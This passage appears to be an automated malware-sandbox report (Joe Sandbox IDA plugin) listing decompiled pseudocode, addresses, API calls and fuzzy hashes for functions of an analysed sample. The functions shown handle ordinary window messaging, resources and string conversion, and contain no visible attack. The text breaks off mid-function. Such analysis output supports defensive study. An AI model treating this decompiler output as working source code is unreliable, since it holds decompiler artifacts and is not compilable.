API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: e6f28c74d63e3e0f4c9bb6e8f8a4ffe9fc3b50b675efa29d1162e23e9e8736cd
Instruction ID: 21f77df2bb305b21e633773eb41cbea4057ecc6761c3a3b171915aab709e64d7
Opcode Fuzzy Hash: e6f28c74d63e3e0f4c9bb6e8f8a4ffe9fc3b50b675efa29d1162e23e9e8736cd
Instruction Fuzzy Hash: F001C476500209BBDB109F658C85FAF73BCAF48708F41083ABA01E7181DA78E91587A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B87A, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040B87A(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E0040A5C3(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E0040AF65(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					E0040A5C3(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_t2 =  &_v20; // 0x4423e8
					_v20 = 0x442480;
					E0041F7F4(_t2, 0x43c590);
					asm("int3");
					_push(4);
					E0041F6EA(E00431BFC, 0, SendMessageA, _t33);
					_t29 = E0040F014(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E0040D519(_t29);
					}
					return E0041F7C2(_t24);
				}
			}

0x0040b87a
0x0040b87a
0x0040b87c
0x0040b889
0x0040b88b
0x0040b88d
0x0040b88f
0x0040b88f
0x0040b895
0x0040b8a4
0x0040b8b1
0x0040b8b6
0x0040b8bd
0x0040b8c1
0x0040b8cf
0x0040b8dc
0x0040b8e1
0x0040b8e9
0x0040b8f0
0x0040b8f0
0x0040b8f5
0x0040b8c3
0x004037e6
0x004037ec
0x004037f0
0x004037f7
0x004037fc
0x004037fd
0x00403804
0x00403813
0x00403815
0x00403818
0x0040381c
0x0040381f
0x00403821
0x00403821
0x0040382b
0x0040382b

APIs

SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 0040B8A4
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 0040B8CF

Part of subcall function 0040A5C3: GetTopWindow.USER32(00000000), ref: 0040A5D1

GetCapture.USER32 ref: 0040B8E1
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0040B8F0

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: MessageSend$CaptureWindow
String ID:
API String ID: 729421689-0
Opcode ID: 6beb2dde5ff0e5b61ad0c8a51189c6d7a99162051fb35d5cd912703861ab2b7c
Instruction ID: e49af4e3184ea6db717b127f1b3927963753d97c6b9026f51526ec4d1578ed3f
Opcode Fuzzy Hash: 6beb2dde5ff0e5b61ad0c8a51189c6d7a99162051fb35d5cd912703861ab2b7c
Instruction Fuzzy Hash: 360171B13503097FFA212B208CC9FBB76ADEB88748F010539F241BB1E2CAA55C005A69

Uniqueness

Uniqueness Score: -1.00%

Function 00406C31, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406C31(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				struct HRSRC__* _t25;
				void* _t28;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t37;
				struct HINSTANCE__* _t39;

				_push(__ecx);
				_t28 = 0;
				_t40 = _a8;
				_push(_t36);
				_t34 = __ecx;
				_v8 = 0;
				if(_a8 == 0) {
					L4:
					_t37 = _a4;
					_a8 = 1;
					if(_t28 != 0) {
						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
						if(_v8 != 0) {
							FreeResource(_v8);
						}
					}
					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
					}
					_t18 = _a8;
					L10:
					return _t18;
				}
				_t39 =  *(E0040DB94(0, __ecx, _t36, _t40) + 0xc);
				_t25 = FindResourceA(_t39, _a8, 0xf0);
				if(_t25 == 0) {
					goto L4;
				}
				_t18 = LoadResource(_t39, _t25);
				_v8 = _t18;
				if(_t18 == 0) {
					goto L10;
				}
				_t28 = LockResource(_t18);
				goto L4;
			}

0x00406c34
0x00406c36
0x00406c38
0x00406c3b
0x00406c3d
0x00406c3f
0x00406c42
0x00406c77
0x00406c79
0x00406c7c
0x00406c83
0x00406c95
0x00406c98
0x00406c9d
0x00406c9d
0x00406c98
0x00406ca7
0x00406cb1
0x00406cb1
0x00406cb7
0x00406cba
0x00406cbe
0x00406cbe
0x00406c49
0x00406c55
0x00406c5d
0x00000000
0x00000000
0x00406c61
0x00406c69
0x00406c6c
0x00000000
0x00000000
0x00406c75
0x00000000

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 00406C55
LoadResource.KERNEL32(?,00000000), ref: 00406C61
LockResource.KERNEL32(00000000), ref: 00406C6F
FreeResource.KERNEL32(00000000), ref: 00406C9D

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 725bdaf51e1b943991e5373a74aa2e6cad060cb5622a81dcc914f303c66514db
Instruction ID: 11cc8024c2f07788693a5cf3b80dfacf3a4c7265796ede5ebdbe0383e22cf367
Opcode Fuzzy Hash: 725bdaf51e1b943991e5373a74aa2e6cad060cb5622a81dcc914f303c66514db
Instruction Fuzzy Hash: 2B112871600209EFDB108FA6D848A9B7BB9FF44355F05807AF946A7291CB78A910CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00415364, Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00415364(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, RECT* _a8, int _a12) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t35;

				_t35 = _a4;
				E0040DBE0( &_v12, __eflags,  *((intOrPtr*)(_t35 - 0xb0)));
				if(_a8 != 0) {
					IntersectRect( &_v28, _a8, _t35 - 0x9c);
					EqualRect( &_v28, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v28) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t35 - 0xac)) + 0x20)) + 0x20),  &_v28, _a12);
				}
				if(_v8 != 0) {
					_push(_v12);
					_push(0);
					E0040D3B7();
				}
				return 0;
			}

0x0041536b
0x00415377
0x00415380
0x004153a3
0x004153b0
0x00415382
0x0041538d
0x0041538e
0x0041538f
0x00415390
0x00415392
0x004153c2
0x004153d7
0x004153d7
0x004153e2
0x004153e4
0x004153e7
0x004153e9
0x004153e9
0x004153f1

APIs

IntersectRect.USER32 ref: 004153A3
EqualRect.USER32 ref: 004153B0
IsRectEmpty.USER32(?), ref: 004153BA
InvalidateRect.USER32(?,?,?), ref: 004153D7

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Rect$EmptyEqualIntersectInvalidate
String ID:
API String ID: 3354205298-0
Opcode ID: cd773583f8eec6913ba4177664b886877b1c38ce39c4077a6852081b8256b7b2
Instruction ID: 695aae43ea9637a98273fc7b87fa48ff0bcdc9407a5be2b6daed2edba48ecd02
Opcode Fuzzy Hash: cd773583f8eec6913ba4177664b886877b1c38ce39c4077a6852081b8256b7b2
Instruction Fuzzy Hash: 8711187690020EEBCF01DF94D889FDEBBB9FF44309F004062FA04AB111D375AA959BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410317, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00410317(void* __ecx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				void* _t11;
				int _t13;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t34;
				void* _t35;

				_push(__ecx);
				_t23 = __ecx;
				_t9 = E00402EE1(__eflags, 0x10);
				_t37 = _t9;
				if(_t9 == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E004102FA(_t9, _t37);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t34 = _t32;
				if(_t13 == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E0041B0C1(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}

0x0041031a
0x0041031f
0x00410321
0x00410326
0x00410329
0x00410336
0x00410336
0x0041032b
0x00410332
0x00410332
0x00410349
0x00410352
0x0041035a
0x0041035b
0x0041035f
0x00410367
0x00410367
0x00410374
0x00410374
0x0041037c
0x00410382
0x0041038a

APIs

Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00410349
GetCurrentProcess.KERNEL32(?,00000000), ref: 0041034F
DuplicateHandle.KERNEL32(00000000), ref: 00410352
GetLastError.KERNEL32(?), ref: 0041036D

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: 127a2b6425212ae10ae3fc16ac81f62d75707bc7e267825681550bdd9f0b7852
Instruction ID: 3b195a4d90feac135872a4ffd9d4d720c51410c6d11ff7f0ee39d7a6200223b5
Opcode Fuzzy Hash: 127a2b6425212ae10ae3fc16ac81f62d75707bc7e267825681550bdd9f0b7852
Instruction Fuzzy Hash: 7C018471700204AFDB109BA6CD89F9B7BA8DF84750F144466FD05CB281DBB5EC809BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404952, Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404952(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* _t16;
				int _t17;
				int _t18;
				struct HWND__* _t19;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t32 = __edi;
				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x14));
					if(__eflags == 0) {
						L3:
						_t17 = E004037E3(0, _t25, _t32, _t35, _t39);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						_push(__edi);
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						_t19 = GetFocus();
						__eflags = _t19 -  *(_t33 + 0x20);
						if(_t19 ==  *(_t33 + 0x20)) {
							SendMessageA( *(E00409C97(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E0040CA8B( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}

0x00404952
0x00404954
0x00404956
0x0040495d
0x00404992
0x00404995
0x0040496c
0x0040496c
0x00404971
0x00404977
0x0040498a
0x004049d5
0x004049d5
0x00000000
0x004049d5
0x00404997
0x0040499b
0x0040499d
0x0040499e
0x004049a1
0x004049a7
0x004049aa
0x004049c2
0x004049c2
0x004049c8
0x004049d0
0x00000000
0x004049d0
0x00404962
0x00404964
0x00404967
0x0040496a
0x00000000
0x00000000
0x00000000
0x0040496a
0x004049de

APIs

EnableMenuItem.USER32 ref: 0040498A

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

GetFocus.USER32 ref: 004049A1
GetParent.USER32(?), ref: 004049AF
SendMessageA.USER32(?,00000028,00000000,00000000), ref: 004049C2

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
String ID:
API String ID: 3849708097-0
Opcode ID: e72bafc065e83abc75d2031577df1877b7e0563ed678ea765f6496426475fe74
Instruction ID: 914c255c74ae2b2e161b517f63bea8142904b75b6db113dff41908d8fcf81d8c
Opcode Fuzzy Hash: e72bafc065e83abc75d2031577df1877b7e0563ed678ea765f6496426475fe74
Instruction Fuzzy Hash: F5113CF1100600AFDB209F60DC85A6BB7B5FBD4326B10C63EF286625A0C734AC45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5C3, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040A5C3(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E00409CBE(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E0040A2E8(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E0040A5C3(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}

0x0040a5c3
0x0040a5c3
0x0040a5cb
0x0040a5d1
0x0040a634
0x0040a634
0x0040a638
0x00000000
0x00000000
0x0040a5d5
0x0040a5d9
0x0040a603
0x0040a5db
0x0040a5dc
0x0040a5e1
0x0040a5e3
0x0040a5e5
0x0040a5e8
0x0040a5eb
0x0040a5ee
0x0040a5f1
0x0040a5f2
0x0040a5f2
0x0040a5e3
0x0040a609
0x0040a60d
0x0040a610
0x0040a612
0x0040a614
0x0040a626
0x0040a626
0x0040a614
0x0040a62e
0x0040a62e
0x0040a63d

APIs

GetTopWindow.USER32(00000000), ref: 0040A5D1
GetTopWindow.USER32(00000000), ref: 0040A610
GetWindow.USER32(00000000,00000002), ref: 0040A62E

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 5fdfce87b7b707005e05352e841891f402f616d7f1fe5be37b2960e84f9d87ac
Instruction ID: 6bb7837223b1437e7f35f4f841dbeb3d150c6d8cc2c7bce5033a1c3b76c9a84e
Opcode Fuzzy Hash: 5fdfce87b7b707005e05352e841891f402f616d7f1fe5be37b2960e84f9d87ac
Instruction Fuzzy Hash: AC01ED3600161ABBCF126F559C04EDF3B36FF48350F054426F940651A1D73AC972EBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC5F, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040EC5F(short* _a4) {
				char* _v0;
				int _v8;
				int _v16;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t6;
				char* _t7;
				void* _t12;
				char* _t13;
				void* _t15;
				void* _t16;
				short* _t20;

				_t20 = _a4;
				if(_t20 != 0) {
					__imp__#7(_t20, _t16, _t12);
					_v8 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_t13 = _t7;
					__eflags = _t13;
					if(__eflags == 0) {
						E004037AF(_t13, _t15, WideCharToMultiByte, 0, __eflags);
					}
					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
					return _t13;
				}
				return 0;
			}

0x0040ec61
0x0040ec6a
0x0040ec73
0x0040ec87
0x0040ec8b
0x0040ec8f
0x0040ec93
0x0040ec99
0x0040ec9b
0x0040ec9d
0x0040ec9f
0x0040ec9f
0x0040ecb2
0x00000000
0x0040ecb7
0x00000000

APIs

SysStringLen.OLEAUT32(?), ref: 0040EC73
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,0041BC26,00000000,00000018,0041BF6C), ref: 0040EC8B
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0040EC93
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,0041BC26,00000000,00000018,0041BF6C), ref: 0040ECB2

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: d53530b6845a85bbb5eb6b3b7f3747d219b095aaba301d680609f69000207b61
Instruction ID: a8860d5d0e509bcf303a4908704158829630dd5dfdd3e8d3169bb9f7432348a3
Opcode Fuzzy Hash: d53530b6845a85bbb5eb6b3b7f3747d219b095aaba301d680609f69000207b61
Instruction Fuzzy Hash: 47F012761062287F93211BA79C4CCABBF9CFE9A3E5B10093AF549A2150D6799810C6F5

Uniqueness

Uniqueness Score: -1.00%

Function 0042AC64, Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042AC64(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0042A561(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0042A64D(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0042AB6C(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0042AAB3(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x0042ac64
0x0042ac67
0x0042ac6d
0x0042ace0
0x00000000
0x0042ac74
0x0042ac74
0x0042ac77
0x0042ac92
0x0042ac95
0x0042acb5
0x0042acc7
0x0042ac97
0x0042ac97
0x0042ac9a
0x00000000
0x0042ac9c
0x0042acae
0x0042acae
0x0042ac9a
0x0042ace5
0x0042ace9
0x0042ac79
0x0042ac91
0x0042ac91
0x0042ac77

APIs

__cftof_l.LIBCMT ref: 0042AC88

Part of subcall function 0042AAB3: __fltout2.LIBCMT ref: 0042AADD

__cftog_l.LIBCMT ref: 0042ACAE
__cftoe_l.LIBCMT ref: 0042ACE0

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 3dbc08a52ec38b7d7a761f0fe1270b82bedc95c96d3fe4623e25e7259ca750c8
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: 8B017B3250015EBBCF125F85ED018EE3F22BF19344B888416FE1959130D23BC9B1EB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00409F82, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00409F82(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E00409F82(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E00409C97(_t13, _t14, _t18);
						}
						_t10 = E00409CBE(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E00409F82(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

0x00409f82
0x00409f82
0x00409f8d
0x00409f93
0x00409f99
0x00409f9d
0x00409fcd
0x00409fd0
0x00409fed
0x00409fed
0x00409fef
0x00409ff1
0x00000000
0x00000000
0x00409fdb
0x00409fe0
0x00409fe2
0x00409fe7
0x00000000
0x00409fe7
0x00000000
0x00409fe2
0x00409f9f
0x00409fa4
0x00409fb6
0x00409fba
0x00409fbb
0x00000000
0x00409fbd
0x00409fc4
0x00409fc9
0x00409fcb
0x00000000
0x00000000
0x00409fa6
0x00409fad
0x00409fb4
0x00000000
0x00000000
0x00409fb4
0x00409fa4
0x00409ff6
0x00409ff6

APIs

GetDlgItem.USER32 ref: 00409F8D
GetTopWindow.USER32(00000000), ref: 00409FA0

Part of subcall function 00409F82: GetWindow.USER32(00000000,00000002), ref: 00409FE7

GetTopWindow.USER32(?), ref: 00409FD0

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 6b3d63afe5932d7f4a6ca00e44b07854abff9deeab6878bfa63d6e411355adcf
Instruction ID: f6ea6eabe51ed2d5a48b12d105cf3c13206c2d8bb6ceeb41934ac94127644c0a
Opcode Fuzzy Hash: 6b3d63afe5932d7f4a6ca00e44b07854abff9deeab6878bfa63d6e411355adcf
Instruction Fuzzy Hash: 89018F32505617B7CB222F519C00EDF3A58AF807E0F054036FD00F6292D739DD11A6A9

Uniqueness

Uniqueness Score: -1.00%

Function 0042526C, Relevance: 6.0, APIs: 4, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0042526C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

